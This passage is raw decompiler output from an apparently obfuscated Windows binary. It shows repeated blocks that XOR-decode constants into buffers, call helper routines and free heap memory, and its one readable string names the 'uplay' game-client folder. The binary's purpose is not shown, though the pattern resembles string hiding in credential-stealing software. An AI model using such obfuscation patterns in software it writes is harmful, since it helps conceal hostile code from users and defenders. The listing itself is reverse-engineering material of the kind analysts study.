				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2559 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b84be7;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b84be7;
				_t1183 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db46a7;
				 *(_t2470 + 0x30) = 0x847c4a79;
				_t2159 =  *(_t2470 + 0x30);
				E00007FF77FF768B7DC65(_t1183, 0,  *(_t2470 + 0x30), _t2159);
				_t1185 = E00007FF77FF768BEFD87(0x847c4a79,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x847c4a79;
				 *(_t2470 + 0xf8) = _t2159;
				_t2159[0] =  *0xEC5D43F3847C4A7D & 0x0000ffff ^ 0x0000f42b;
				 *_t2159 = 0x9d94fc45;
				 *((long long*)(_t2470 + 0x100)) = 6;
				 *(_t2470 + 0x30) = 0x68db4661;
				 *(_t2470 + 0x30) = 0x32a5a186;
				E00007FF77FF768B7CBF8(_t1185, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2939 ^  *0x968ED09632A5A186;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84c96;
				E00007FF77FF768BEFD87(0x32a5a186, 0);
				_t2560 = _t2470 + 0x210;
				 *_t2560 = 0x32a5a186;
				 *((long long*)(_t2560 + 8)) = 0x68dc2939;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2560 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b84d24;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b84d24;
				_t1188 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dbe0cd;
				 *(_t2470 + 0x30) = 0xdd2fc88a;
				_t2163 =  *(_t2470 + 0x30);
				E00007FF77FF768B7DCDC(_t1188, 0,  *(_t2470 + 0x30), _t2163);
				_t1190 = E00007FF77FF768BEFD87(0xdd2fc88a,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0xdd2fc88a;
				 *(_t2470 + 0xf8) = _t2163;
				 *_t2163 = 0x410cc3aa ^  *0xdd2fc88a;
				 *((long long*)(_t2470 + 0x100)) = 8;
				 *(_t2470 + 0x30) = 0x68dbd649;
				 *(_t2470 + 0x30) = 0xd822277b;
				E00007FF77FF768B7D92A(_t1190, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2959 ^  *0xF6E42A5CD822277B;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84dc9;
				E00007FF77FF768BEFD87(0xd822277b, 0);
				_t2561 = _t2470 + 0x210;
				 *_t2561 = 0xd822277b;
				 *((long long*)(_t2561 + 8)) = 0x68dc2959;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2561 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b84e57;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b84e57;
				_t1193 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dba49f;
				 *(_t2470 + 0x30) = 0xca308153;
				_t2167 =  *(_t2470 + 0x30);
				E00007FF77FF768B7BFBC(_t1193,  *(_t2470 + 0x30), _t2167);
				_t1195 = E00007FF77FF768BEFD87(0xca308153,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0xca308153;
				 *(_t2470 + 0xf8) = _t2167;
				 *_t2167 = 0xb01d12c8 ^  *0xca308153;
				 *((long long*)(_t2470 + 0x100)) = 8;
				 *(_t2470 + 0x30) = 0x68dc1b0e;
				 *(_t2470 + 0x30) = 0x9ab57f57;
				E00007FF77FF768B7CEB2(_t1195, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2979 ^  *0x84F735FE9AB57F57;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84efc;
				E00007FF77FF768BEFD87(0x9ab57f57, 0);
				_t2562 = _t2470 + 0x210;
				 *_t2562 = 0x9ab57f57;
				 *((long long*)(_t2562 + 8)) = 0x68dc2979;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2562 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b84f8a;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b84f8a;
				HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dba521;
				 *(_t2470 + 0x30) = 0xbe4f58d4;
				_t2171 =  *(_t2470 + 0x30);
				0x68b7d418();
				dil = dil ^ 0x0000006c;
				E00007FF77FF768BEFD87(0xbe4f58d4,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0xbe4f58d4;
				 *(_t2470 + 0xf8) = _t2171;
				 *_t2171 = 0x968af918 ^  *0xbe4f58d4;
				_t2171[1] =  *0xAED41832BE4F58DC & 0x0000ffff ^ 0x0000f0e5;
				_t2171[1] = dil;
				 *((long long*)(_t2470 + 0x100)) = 0xb;
				 *(_t2470 + 0x30) = 0x68db99c1;
				 *(_t2470 + 0x30) = 0x9d43908b;
				0x68b7c88d();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2999 ^  *0xF54657F19D43908B;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85049;
				E00007FF77FF768BEFD87(0x9d43908b, 0);
				_t2563 = _t2470 + 0x210;
				 *_t2563 = 0x9d43908b;
				 *((long long*)(_t2563 + 8)) = 0x68dc2999;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2563 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b850d7;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b850d7;
				_t1201 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dc007a;
				 *(_t2470 + 0x30) = 0x7bf8e2ea;
				_t2175 =  *(_t2470 + 0x30);
				E00007FF77FF768B7BF75(_t1201, 0,  *(_t2470 + 0x30), _t2175);
				_t1203 = E00007FF77FF768BEFD87(0x7bf8e2ea,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x7bf8e2ea;
				 *(_t2470 + 0xf8) = _t2175;
				 *_t2175 = 0x67b83666 ^  *0x7bf8e2ea;
				 *((long long*)(_t2470 + 0x100)) = 4;
				 *(_t2470 + 0x30) = 0x68dc06c6;
				 *(_t2470 + 0x30) = 0x6ce30012;
				E00007FF77FF768B7BE0B(_t1203, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC29B9 ^  *0xDEAC59C86CE30012;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85175;
				E00007FF77FF768BEFD87(0x6ce30012, 0);
				_t2564 = _t2470 + 0x210;
				 *_t2564 = 0x6ce30012;
				 *((long long*)(_t2564 + 8)) = 0x68dc29b9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2564 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b85203;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b85203;
				_t1206 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db8be3;
				 *(_t2470 + 0x30) = 0x8b89db0f;
				_t2179 =  *(_t2470 + 0x30);
				E00007FF77FF768B7DD17(_t1206, 0,  *(_t2470 + 0x30), _t2179);
				E00007FF77FF768BEFD87(0x8b89db0f,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x8b89db0f;
				 *(_t2470 + 0xf8) = _t2179;
				 *_t2179 = 0x5301e017 ^  *0x8b89db0f;
				 *((long long*)(_t2470 + 0x100)) = 8;
				 *(_t2470 + 0x30) = 0x68dc386c;
				 *(_t2470 + 0x30) = 0x6b3b225b;
				0x68b7d741();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC29D9 ^  *0x1BE3B0E36B3B225B;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b852a8;
				E00007FF77FF768BEFD87(0x6b3b225b, 0);
				_t2565 = _t2470 + 0x210;
				 *_t2565 = 0x6b3b225b;
				 *((long long*)(_t2565 + 8)) = 0x68dc29d9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2565 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b85336;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b85336;
				_t1210 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dc0261;
				 *(_t2470 + 0x30) = 0x762a529d;
				_t2183 =  *(_t2470 + 0x30);
				E00007FF77FF768B7C031(_t1210, 0,  *(_t2470 + 0x30), _t2183);
				E00007FF77FF768BEFD87(0x762a529d,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x762a529d;
				 *(_t2470 + 0xf8) = _t2183;
				 *_t2183 = 0x5b1df43d ^  *0x762a529d;
				_t2183[1] =  *0x3FF2457E762A52A5 ^ 0x00000010;
				 *((long long*)(_t2470 + 0x100)) = 9;
				 *(_t2470 + 0x30) = 0x68dbf02e;
				 *(_t2470 + 0x30) = 0xd15deb71;
				0x68b7e492();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC29F9 ^  *0x5EB0EA4AD15DEB71;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b853e4;
				E00007FF77FF768BEFD87(0xd15deb71, 0);
				_t2566 = _t2470 + 0x210;
				 *_t2566 = 0xd15deb71;
				 *((long long*)(_t2566 + 8)) = 0x68dc29f9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2566 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b85472;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b85472;
				_t1214 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dc2734;
				 *(_t2470 + 0x30) = 0x514d6bd6;
				_t2187 =  *(_t2470 + 0x30);
				E00007FF77FF768B7CB76(_t1214, 0,  *(_t2470 + 0x30), _t2187);
				E00007FF77FF768BEFD87(0x514d6bd6,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x514d6bd6;
				 *(_t2470 + 0xf8) = _t2187;
				 *_t2187 = 0x6d8c7b74 ^  *0x514d6bd6;
				_t2187[1] =  *0x49F5C648514D6BDE & 0x0000ffff ^ 0x00002396;
				 *((long long*)(_t2470 + 0x100)) = 0xa;
				 *(_t2470 + 0x30) = 0x68dc3d14;
				 *(_t2470 + 0x30) = 0x29fcd52;
				E00007FF77FF768B7CE48(0, 0x29fcd52,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				_t2442 =  *0x7FF768DC2A19 ^  *0x376FB13E029FCD52;
				 *(_t2470 + 0x30) = _t2442;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85525;
				E00007FF77FF768BEFD87(0x29fcd52, 0);
				_t2567 = _t2470 + 0x210;
				 *_t2567 = 0x29fcd52;
				 *((long long*)(_t2567 + 8)) = 0x68dc2a19;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2567 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				_t2527 =  *((intOrPtr*)(_t2470 + 0x1a8));
				if (_t2527 == 0) goto 0x68b855b3;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b855b3;
				HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dbdbf5;
				 *(_t2470 + 0x30) = 0xf94de544;
				_t2191 =  *(_t2470 + 0x30);
				0x68b7d631();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x2d0], xmm0");
				r9b = 1;
				r8d =  *(_t2191 + 0x68dc2a39) & 0x000000ff;
				r11d =  *((_t2191 | 0x00000002) + 0x68dc2a39) & 0x000000ff;
				r14d =  *((_t2191 | 0x00000003) + 0x68dc2a39) & 0x000000ff;
				_t2618 = _t2617 << 0x18;
				_t2586 = _t2585 << 0x10;
				_t1791 = (_t1783 << 0x00000008 | _t2527 | _t2586 | _t2618 | (_t2191 | 0x00000004) << 0x00000020 | _t2442 << 0x00000028 | (_t2191 | 0x00000006) << 0x00000030 | (_t2191 | 0x00000007) << 0x00000038) ^  *(0xf94de544 + _t2191);
				 *(_t2470 + _t2191 + 0x2d0) = _t1791;
				r9d = 0;
				if ((r9b & 0x00000001) != 0) goto 0x68b855f4;
				 *(_t2470 + 0x2e0) = 0x484d1d70 ^  *0x85D1DF85F94DE554;
				 *((short*)(_t2470 + 0x2e4)) =  *0x85D1DF85F94DE558 & 0x0000ffff ^ 0x000078a1;
				 *(_t2470 + 0x2e6) =  *0x85D1DF85F94DE55A & 0x000000ff ^ 0x0000008e;
				_t1222 = E00007FF77FF768BEFD87(0xf94de544, (_t2191 | 0x00000004) << 0x20);
				 *(_t2470 + 0xf0) = 0xf94de544;
				 *(_t2470 + 0xf8) = _t2191;
				asm("movaps xmm0, [esp+0x2d0]");
				asm("movups [edx], xmm0");
				 *((long long*)(_t2191 + 0xf)) =  *((intOrPtr*)(_t2470 + 0x2df));
				 *((long long*)(_t2470 + 0x100)) = 0x17;
				 *(_t2470 + 0x30) = 0x68db80a3;
				 *(_t2470 + 0x30) = 0x80cc0fdf;
				E00007FF77FF768B7CD85(_t1222, 8,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				_t2445 =  *0x7FF768DC2A50 ^  *0x41E8595980CC0FDF;
				 *(_t2470 + 0x30) = _t2445;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8574f;
				E00007FF77FF768BEFD87(0x80cc0fdf, 0);
				_t2568 = _t2470 + 0x210;
				 *_t2568 = 0x80cc0fdf;
				 *((long long*)(_t2568 + 8)) = 0x68dc2a50;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2568 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				_t2529 =  *((intOrPtr*)(_t2470 + 0x1a8));
				if (_t2529 == 0) goto 0x68b857dd;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b857dd;
				_t1225 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = "uplay\\";
				 *(_t2470 + 0x30) = 0xe447a61b;
				_t2195 =  *(_t2470 + 0x30);
				E00007FF77FF768B7E229(_t1225, 0,  *(_t2470 + 0x30), _t2195);
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x2d0], xmm0");
				r9b = 1;
				r8d =  *(_t2195 + 0x68dc2a70) & 0x000000ff;
				r11d =  *((_t2195 | 0x00000002) + 0x68dc2a70) & 0x000000ff;
				r14d =  *((_t2195 | 0x00000003) + 0x68dc2a70) & 0x000000ff;
				_t2619 = _t2618 << 0x18;
				_t2587 = _t2586 << 0x10;
				_t1799 = (_t1791 << 0x00000008 | _t2529 | _t2587 | _t2619 | (_t2195 | 0x00000004) << 0x00000020 | _t2445 << 0x00000028 | (_t2195 | 0x00000006) << 0x00000030 | (_t2195 | 0x00000007) << 0x00000038) ^  *(0xe447a61b + _t2195);
				 *(_t2470 + _t2195 + 0x2d0) = _t1799;
				r9d = 0;
				if ((r9b & 0x00000001) != 0) goto 0x68b8581e;
				 *(_t2470 + 0x2e0) = 0x87f436c8 ^  *0xE25571E6E447A62B;
				 *((short*)(_t2470 + 0x2e4)) =  *0xE25571E6E447A62F & 0x0000ffff ^ 0x0000fd9e;
				E00007FF77FF768BEFD87(0xe447a61b, (_t2195 | 0x00000004) << 0x20);
				 *(_t2470 + 0xf0) = 0xe447a61b;
				 *(_t2470 + 0xf8) = _t2195;
				asm("movaps xmm0, [esp+0x2d0]");
				asm("movups [edx], xmm0");
				 *((long long*)(_t2195 + 0xe)) =  *((intOrPtr*)(_t2470 + 0x2de));
				 *((long long*)(_t2470 + 0x100)) = 0x16;
				 *(_t2470 + 0x30) = 0x68dbfff0;
				 *(_t2470 + 0x30) = 0x34ecdd9e;
				E00007FF77FF768B7DC19( *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				_t2448 =  *0x7FF768DC2A86 ^  *0x77C07BC734ECDD9E;
				 *(_t2470 + 0x30) = _t2448;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8596b;
				E00007FF77FF768BEFD87(0x34ecdd9e, 0);
				_t2569 = _t2470 + 0x210;
				 *_t2569 = 0x34ecdd9e;
				 *((long long*)(_t2569 + 8)) = 0x68dc2a86;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2569 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				_t2531 =  *((intOrPtr*)(_t2470 + 0x1a8));
				if (_t2531 == 0) goto 0x68b859f9;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b859f9;
				_t1231 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db5217;
				 *(_t2470 + 0x30) = 0xc807053;
				_t2199 =  *(_t2470 + 0x30);
				E00007FF77FF768B7C2EF(_t1231,  *(_t2470 + 0x30), _t2199);
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x2d0], xmm0");
				r9b = 1;
				r8d =  *(_t2199 + 0x68dc2aa6) & 0x000000ff;
				r11d =  *((_t2199 | 0x00000002) + 0x68dc2aa6) & 0x000000ff;
				r14d =  *((_t2199 | 0x00000003) + 0x68dc2aa6) & 0x000000ff;
				_t1807 = (_t1799 << 0x00000008 | _t2531 | _t2587 << 0x00000010 | _t2619 << 0x00000018 | (_t2199 | 0x00000004) << 0x00000020 | _t2448 << 0x00000028 | (_t2199 | 0x00000006) << 0x00000030 | (_t2199 | 0x00000007) << 0x00000038) ^  *(0xc807053 + _t2199);
				 *(_t2470 + _t2199 + 0x2d0) = _t1807;
				r9d = 0;
				if ((r9b & 0x00000001) != 0) goto 0x68b85a3a;
				 *(_t2470 + 0x2e0) = 0x18c40e30 ^  *0x66484DAA0C807063;
				 *((short*)(_t2470 + 0x2e4)) =  *0x66484DAA0C807067 & 0x0000ffff ^ 0x00001491;
				 *(_t2470 + 0x2e6) =  *0x66484DAA0C807069 & 0x000000ff ^ 0x0000004a;
				_t1235 = E00007FF77FF768BEFD87(0xc807053, (_t2199 | 0x00000004) << 0x20);
				 *(_t2470 + 0xf0) = 0xc807053;
				 *(_t2470 + 0xf8) = _t2199;
				asm("movaps xmm0, [esp+0x2d0]");
				asm("movups [edx], xmm0");
				 *((long long*)(_t2199 + 0xf)) =  *((intOrPtr*)(_t2470 + 0x2df));
				 *((long long*)(_t2470 + 0x100)) = 0x17;
				 *(_t2470 + 0x30) = 0x68db8863;
				 *(_t2470 + 0x30) = 0x6572eab;
				E00007FF77FF768B7D3C3(_t1235, 8,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2ABD ^  *0x36EFF67806572EAB;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85b95;
				E00007FF77FF768BEFD87(0x6572eab, 0);
				_t2570 = _t2470 + 0x210;
				 *_t2570 = 0x6572eab;
				 *((long long*)(_t2570 + 8)) = 0x68dc2abd;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2570 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b85c23;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b85c23;
				HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68db562c;
				 *(_t2470 + 0x30) = 0x7df5950d;
				_t2203 =  *(_t2470 + 0x30);
				0x68b7c838();
				E00007FF77FF768BEFD87(0x7df5950d,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0x7df5950d;
				 *(_t2470 + 0xf8) = _t2203;
				 *_t2203 = 0xef917bdf ^  *0x7df5950d;
				 *((long long*)(_t2470 + 0x100)) = 8;
				 *(_t2470 + 0x30) = 0x68dbac39;
				 *(_t2470 + 0x30) = 0xfacb1a78;
				0x68b7c81a();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2ADD ^  *0x1C5E9D9CFACB1A78;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85cc8;
				E00007FF77FF768BEFD87(0xfacb1a78, 0);
				_t2571 = _t2470 + 0x210;
				 *_t2571 = 0xfacb1a78;
				 *((long long*)(_t2571 + 8)) = 0x68dc2add;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2571 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b85d56;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b85d56;
				HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dc2726;
				 *(_t2470 + 0x30) = 0xb3f29f9c;
				_t2207 =  *(_t2470 + 0x30);
				E00007FF77FF768B7D312(0, 0xb3f29f9c,  *(_t2470 + 0x30), _t2207);
				E00007FF77FF768BEFD87(0xb3f29f9c,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0xb3f29f9c;
				 *(_t2470 + 0xf8) = _t2207;
				 *_t2207 = 0x9f2f92d9 ^  *0xb3f29f9c;
				 *((long long*)(_t2470 + 0x100)) = 8;
				 *(_t2470 + 0x30) = 0x68dbcecc;
				 *(_t2470 + 0x30) = 0x5c34c53f;
				E00007FF77FF768B7BE4E(0, 0x5c34c53f,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2AFD ^  *0xFC68DCF15C34C53F;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85dfb;
				E00007FF77FF768BEFD87(0x5c34c53f, 0);
				_t2572 = _t2470 + 0x210;
				 *_t2572 = 0x5c34c53f;
				 *((long long*)(_t2572 + 8)) = 0x68dc2afd;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2572 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b85e89;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b85e89;
				_t1246 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dc050f;
				 *(_t2470 + 0x30) = 0xcd78d21a;
				_t2211 =  *(_t2470 + 0x30);
				E00007FF77FF768B7E2E1(_t1246, 0,  *(_t2470 + 0x30), _t2211);
				_t1248 = E00007FF77FF768BEFD87(0xcd78d21a,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0xcd78d21a;
				 *(_t2470 + 0xf8) = _t2211;
				 *_t2211 = 0xc5f71b7c ^  *0xcd78d21a;
				_t2211[1] = 0x4db26ef7 ^  *0x5E87F654CD78D222;
				 *((long long*)(_t2470 + 0x100)) = 0xc;
				 *(_t2470 + 0x30) = 0x68dc3799;
				 *(_t2470 + 0x30) = 0x9992eeac;
				E00007FF77FF768B7C2C8(_t1248, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2B1D ^  *0x2C9534B59992EEAC;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85f39;
				E00007FF77FF768BEFD87(0x9992eeac, 0);
				_t2573 = _t2470 + 0x210;
				 *_t2573 = 0x9992eeac;
				 *((long long*)(_t2573 + 8)) = 0x68dc2b1d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2573 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b85fc7;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b85fc7;
				_t1251 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dbe212;
				 *(_t2470 + 0x30) = 0xc6df36eb;
				_t2215 =  *(_t2470 + 0x30);
				E00007FF77FF768B7CA55(_t1251, 0,  *(_t2470 + 0x30), _t2215);
				_t1253 = E00007FF77FF768BEFD87(0xc6df36eb,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = 0xc6df36eb;
				 *(_t2470 + 0xf8) = _t2215;
				_t2215[0] =  *0x2C5A6B38C6DF36EF & 0x0000ffff ^ 0x0000f9af;
				 *_t2215 = 0x93e981a1;
				 *((long long*)(_t2470 + 0x100)) = 6;
				 *(_t2470 + 0x30) = 0x68db5821;
				 *(_t2470 + 0x30) = 0xf7ffd8fe;
				E00007FF77FF768B7DF8B(_t1253, 0,  *(_t2470 + 0x30),  *(_t2470 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2470 + 0x30) =  *0x7FF768DC2B3D ^  *0x164C142CF7FFD8FE;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b86076;
				E00007FF77FF768BEFD87(0xf7ffd8fe, 0);
				_t2574 = _t2470 + 0x210;
				 *_t2574 = 0xf7ffd8fe;
				 *((long long*)(_t2574 + 8)) = 0x68dc2b3d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2574 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2470 + 0x1a8)) == 0) goto 0x68b86104;
				if ( *(_t2470 + 0x1a0) == 0) goto 0x68b86104;
				_t1256 = HeapFree(??, ??, ??);
				 *(_t2470 + 0x30) = 0x68dbb8f6;
				 *(_t2470 + 0x30) = 0x29019584;
				_t2219 =  *(_t2470 + 0x30);
				E00007FF77FF768B7E285(_t1256, 0,  *(_t2470 + 0x30), _t2219);
				_t1736 = _t1807 << 0x30;
				E00007FF77FF768BEFD87(_t1736,  *(_t2470 + 0x30));
				 *(_t2470 + 0xf0) = _t1736;
				 *(_t2470 + 0xf8) = _t2219;
				_t2219[0] = ( *0xD599E13C2901958A & 0x000000ff ^ 0x000000b7) & 0x000000ff;
				 *_t2219 =  *0x29019584;
				_t2219[0] =  *0xD599E13C29019588 & 0x0000ffff ^ 0x0000016b;
